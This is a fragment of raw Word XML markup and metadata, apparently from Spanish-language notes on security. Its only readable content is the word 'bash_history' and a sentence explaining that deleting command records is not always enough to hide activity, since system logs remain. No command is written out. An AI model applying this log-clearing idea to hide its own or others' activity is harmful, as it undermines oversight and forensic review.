      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D048031" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5555A834">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B69326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Se eliminan registros de comandos ejecutados (aunque no siempre es suficiente → logs del sistema siguen existiendo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38105E1D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562"/>
    <w:sectPr w:rsidR="00206562" w:rsidRPr="002065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57698"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09D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33C5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B86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F45E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1E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92290">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1140922928">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2132630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F3"/>
    <w:rsid w:val="000944F3"/>
    <w:rsid w:val="000A7043"/>
    <w:rsid w:val="00127456"/>
    <w:rsid w:val="00206562"/>
    <w:rsid w:val="002B448B"/>
    <w:rsid w:val="002E3A44"/>
    <w:rsid w:val="00321E3A"/>
    <w:rsid w:val="0038717D"/>
    <w:rsid w:val="003F3297"/>
    <w:rsid w:val="004F5D1D"/>
    <w:rsid w:val="007123D4"/>
    <w:rsid w:val="007950B0"/>
    <w:rsid w:val="007C6E08"/>
    <w:rsid w:val="007F5D2C"/>
    <w:rsid w:val="0091094C"/>
    <w:rsid w:val="009321FE"/>
    <w:rsid w:val="00990C31"/>
    <w:rsid w:val="00A01150"/>
    <w:rsid w:val="00A168D0"/>
    <w:rsid w:val="00AA12D6"/>
    <w:rsid w:val="00B83064"/>
    <w:rsid w:val="00C2364F"/>
    <w:rsid w:val="00CA468B"/>
    <w:rsid w:val="00D24100"/>
    <w:rsid w:val="00D2491F"/>
    <w:rsid w:val="00DE5452"/>
    <w:rsid w:val="00E10AE8"/>
    <w:rsid w:val="00E260E0"/>
    <w:rsid w:val="00E43858"/>
    <w:rsid w:val="00E464E0"/>
    <w:rsid w:val="00E51EDA"/>
    <w:rsid w:val="00F5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B244A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDAD11B1-C98F-4E87-A214-90B7AF99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4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4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4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4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4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4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4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4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41</Pages>
  <Words>1005</Words>
  <Characters>5533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Ana María Zamora Jiménez</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-18T07:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-19T09:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>